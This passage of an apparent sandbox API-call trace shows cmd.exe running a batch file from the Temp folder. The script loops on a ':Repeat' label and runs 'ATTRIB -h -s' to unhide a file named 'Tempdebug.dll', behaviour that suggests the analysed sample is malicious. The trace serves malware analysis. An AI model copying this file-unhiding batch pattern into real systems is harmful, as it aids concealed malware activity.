(_String1="\"C", _String2="CLS") returned -65 [0051.083] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0051.083] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0051.083] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0051.083] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0051.083] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0051.083] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0051.083] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0051.083] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0051.083] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0051.083] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0051.083] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0051.083] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0051.084] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0051.084] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0051.084] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0051.084] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0051.084] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0051.084] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0051.084] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0051.084] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0051.084] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0051.084] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0051.084] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0051.084] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0051.084] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0051.084] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0051.084] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0051.084] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0051.084] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0051.084] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0051.084] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0051.084] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0051.084] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0051.084] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0051.084] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0051.084] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0051.084] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0051.084] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0051.084] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0051.084] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0051.084] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0051.084] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0051.084] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0051.084] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0051.084] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0051.084] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0051.084] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0051.084] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0051.084] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0051.084] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0051.084] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0051.084] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0051.084] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0051.084] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0051.084] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0051.084] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0051.084] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0051.084] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0051.084] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0051.084] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0051.084] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0051.084] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0051.084] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0051.085] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0051.085] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0051.085] SetErrorMode (uMode=0x0) returned 0x0 [0051.085] SetErrorMode (uMode=0x1) returned 0x0 [0051.085] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x420a68, lpFilePart=0x24f380 | out: lpBuffer="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp", lpFilePart=0x24f380*="Temp") returned 0x24 [0051.085] SetErrorMode (uMode=0x0) returned 0x1 [0051.086] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\.") returned 1 [0051.086] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0051.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.088] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat", fInfoLevelId=0x1, lpFindFileData=0x24f11c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f11c) returned 0x421e90 [0051.088] FindClose (in: hFindFile=0x421e90 | out: hFindFile=0x421e90) returned 1 [0051.088] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0051.088] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0051.088] GetConsoleTitleW (in: lpConsoleTitle=0x24f5f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.089] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x764f0000 [0051.093] GetProcAddress (hModule=0x764f0000, lpProcName="SaferIdentifyLevel") returned 0x76512102 [0051.093] IdentifyCodeAuthzLevelW () returned 0x1 [0051.098] GetProcAddress (hModule=0x764f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76513352 [0051.099] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0051.099] GetProcAddress (hModule=0x764f0000, lpProcName="SaferCloseLevel") returned 0x76513825 [0051.099] CloseCodeAuthzLevel () returned 0x1 [0051.099] SetErrorMode (uMode=0x0) returned 0x0 [0051.099] SetErrorMode (uMode=0x1) returned 0x0 [0051.099] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat", nBufferLength=0x104, lpBuffer=0x4207d0, lpFilePart=0x24f4e0 | out: lpBuffer="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat", lpFilePart=0x24f4e0*="iun4816.bat") returned 0x30 [0051.099] SetErrorMode (uMode=0x0) returned 0x1 [0051.099] wcsspn (_String=" ", _Control=" \x09") returned 0x1 [0051.099] CmdBatNotification () returned 0x0 [0051.099] CreateFileW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f524, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0051.099] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0051.099] _get_osfhandle (_FileHandle=3) returned 0x58 [0051.099] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0051.100] _get_osfhandle (_FileHandle=3) returned 0x58 [0051.100] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0051.100] ReadFile (in: hFile=0x58, lpBuffer=0x49e76640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f508, lpOverlapped=0x0 | out: lpBuffer=0x49e76640*, lpNumberOfBytesRead=0x24f508*=0xf5, lpOverlapped=0x0) returned 1 [0051.101] SetFilePointer (in: hFile=0x58, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0051.101] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e76640, cbMultiByte=9, lpWideCharStr=0x49e7c640, cchWideChar=8191 | out: lpWideCharStr=":Repeat\r\n") returned 9 [0051.101] _get_osfhandle (_FileHandle=3) returned 0x58 [0051.101] GetFileType (hFile=0x58) returned 0x1 [0051.101] _get_osfhandle (_FileHandle=3) returned 0x58 [0051.101] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0051.101] _tell (_FileHandle=3) returned 9 [0051.101] _close (_FileHandle=3) returned 0 [0051.101] CreateFileW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f524, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0051.101] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0051.101] _get_osfhandle (_FileHandle=3) returned 0x58 [0051.101] SetFilePointer (in: hFile=0x58, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0051.102] _get_osfhandle (_FileHandle=3) returned 0x58 [0051.102] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0051.102] ReadFile (in: hFile=0x58, lpBuffer=0x49e76640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f508, lpOverlapped=0x0 | out: lpBuffer=0x49e76640*, lpNumberOfBytesRead=0x24f508*=0xec, lpOverlapped=0x0) returned 1 [0051.102] SetFilePointer (in: hFile=0x58, lDistanceToMove=71, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x47 [0051.102] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e76640, cbMultiByte=62, lpWideCharStr=0x49e7c640, cchWideChar=8191 | out: lpWideCharStr="ATTRIB -h -s \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll\"\r\n") returned 62 [0051.103] _get_osfhandle (_FileHandle=3) returned 0x58 [0051.103] GetFileType (hFile=0x58) returned 0x1 [0051.103] _get_osfhandle (_FileHandle=3) returned 0x58 [0051.103] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x47 [0051.103] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0051.103] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0051.103] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0051.103] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0051.103] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0051.103] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0051.103] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0051.105] _tell (_FileHandle=3) returned 71 [0051.105] _close (_FileHandle=3) returned 0 [0051.105] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f2dc | out: _Buffer="\r\n") returned 2 [0051.105] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.105] GetFileType (hFile=0x7) returned 0x2 [0051.105] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.105] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f29c | out: lpMode=0x24f29c) returned 1 [0051.105] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.105] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f2c8, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f2c8*=0x2) returned 1 [0051.106] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0051.106] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0051.106] _vsnwprintf (in: _Buffer=0x49e75e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x24f2d8 | out: _Buffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 32 [0051.106] _vsnwprintf (in: _Buffer=0x49e75e80, _BufferCount=0x3de, _Format="%c", _ArgList=0x24f2d8 | out: _Buffer=">") returned 1 [0051.106] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.106] GetFileType (hFile=0x7) returned 0x2 [0051.106] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.106] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f2a0 | out: lpMode=0x24f2a0) returned 1 [0051.106] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.106] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e75e40*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0x24f2cc, lpReserved=0x0 | out: lpBuffer=0x49e75e40*, lpNumberOfCharsWritten=0x24f2cc*=0x21) returned 1 [0051.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.107] GetFileType (hFile=0x7) returned 0x2 [0051.107] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.107] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f524 | out: lpMode=0x24f524) returned 1 [0051.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.108] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4214f8*, nNumberOfCharsToWrite=0x6, lpNumberOfCharsWritten=0x24f550, lpReserved=0x0 | out: lpBuffer=0x4214f8*, lpNumberOfCharsWritten=0x24f550*=0x6) returned 1 [0051.109] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24f55c | out: _Buffer=" -h -s \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll\" ") returned 55 [0051.109] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.109] GetFileType (hFile=0x7) returned 0x2 [0051.109] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.109] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f51c | out: lpMode=0x24f51c) returned 1 [0051.109] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.109] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x37, lpNumberOfCharsWritten=0x24f548, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f548*=0x37) returned 1 [0051.109] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f57c | out: _Buffer="\r\n") returned 2 [0051.109] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.109] GetFileType (hFile=0x7) returned 0x2 [0051.110] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.110] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f53c | out: lpMode=0x24f53c) returned 1 [0051.110] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.110] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f568, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f568*=0x2) returned 1 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="DIR") returned -3 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="ERASE") returned -4 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="DEL") returned -3 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="TYPE") returned -19 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="COPY") returned -2 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="CD") returned -2 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="CHDIR") returned -2 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="RENAME") returned -17 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="REN") returned -17 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="ECHO") returned -4 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="SET") returned -18 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="PAUSE") returned -15 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="DATE") returned -3 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="TIME") returned -19 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="PROMPT") returned -15 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="MD") returned -12 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="MKDIR") returned -12 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="RD") returned -17 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="RMDIR") returned -17 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="PATH") returned -15 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="GOTO") returned -6 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="SHIFT") returned -18 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="CLS") returned -2 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="CALL") returned -2 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="VERIFY") returned -21 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="VER") returned -21 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="VOL") returned -21 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="EXIT") returned -4 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="SETLOCAL") returned -18 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="ENDLOCAL") returned -4 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="TITLE") returned -19 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="START") returned -18 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="DPATH") returned -3 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="KEYS") returned -10 [0051.110] _wcsicmp (_String1="ATTRIB", _String2="MOVE") returned -12 [0051.111] _wcsicmp (_String1="ATTRIB", _String2="PUSHD") returned -15 [0051.111] _wcsicmp (_String1="ATTRIB", _String2="POPD") returned -15 [0051.111] _wcsicmp (_String1="ATTRIB", _String2="ASSOC") returned 1 [0051.111] _wcsicmp (_String1="ATTRIB", _String2="FTYPE") returned -5 [0051.111] _wcsicmp (_String1="ATTRIB", _String2="BREAK") returned -1 [0051.111] _wcsicmp (_String1="ATTRIB", _String2="COLOR") returned -2 [0051.111] _wcsicmp (_String1="ATTRIB", _String2="MKLINK") returned -12 [0051.111] _wcsnicmp (_String1="ATTR", _String2="cmd ", _MaxCount=0x4) returned -2 [0051.111] SetErrorMode (uMode=0x0) returned 0x0 [0051.111] SetErrorMode (uMode=0x1) returned 0x0 [0051.111] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4318d0, lpFilePart=0x24f320 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x24f320*="Desktop") returned 0x20 [0051.111] SetErrorMode (uMode=0x0) returned 0x1 [0051.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0051.111] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0051.111] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0051.111] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.111] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f09c) returned 0xffffffff [0051.112] GetLastError () returned 0x2 [0051.112] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x24f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f09c) returned 0xffffffff [0051.112] GetLastError () returned 0x2 [0051.112] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f09c) returned 0x431be8 [0051.112] FindClose (in: hFindFile=0x431be8 | out: hFindFile=0x431be8) returned 1 [0051.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f09c) returned 0xffffffff [0051.112] GetLastError () returned 0x2 [0051.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f09c) returned 0x431be8 [0051.112] FindClose (in: hFindFile=0x431be8 | out: hFindFile=0x431be8) returned 1 [0051.112] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0051.112] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0051.112] GetConsoleTitleW (in: lpConsoleTitle=0x24f0ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.113] SetErrorMode (uMode=0x0) returned 0x0 [0051.113] SetErrorMode (uMode=0x1) returned 0x0 [0051.113] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x422860, lpFilePart=0x24ec0c | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x24ec0c*="Desktop") returned 0x20 [0051.113] SetErrorMode (uMode=0x0) returned 0x1 [0051.113] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0051.113] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0051.113] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0051.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.113] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e988) returned 0xffffffff [0051.113] GetLastError () returned 0x2 [0051.113] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x24e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e988) returned 0xffffffff [0051.113] GetLastError () returned 0x2 [0051.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.113] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e988) returned 0x422a58 [0051.114] FindClose (in: hFindFile=0x422a58 | out: hFindFile=0x422a58) returned 1 [0051.114] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e988) returned 0xffffffff [0051.114] GetLastError () returned 0x2 [0051.114] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e988) returned 0x422a58 [0051.114] FindClose (in: hFindFile=0x422a58 | out: hFindFile=0x422a58) returned 1 [0051.114] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0051.114] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0051.114] GetConsoleTitleW (in: lpConsoleTitle=0x24ee80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.114] InitializeProcThreadAttributeList (in: lpAttributeList=0x24ed08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24edd0 | out: lpAttributeList=0x24ed08, lpSize=0x24edd0) returned 1 [0051.114] UpdateProcThreadAttribute (in: lpAttributeList=0x24ed08, dwFlags=0x0, Attribute=0x60001, lpValue=0x24edc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24ed08, lpPreviousValue=0x0) returned 1 [0051.114] GetStartupInfoW (in: lpStartupInfo=0x24ecc4 | out: lpStartupInfo=0x24ecc4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.115] 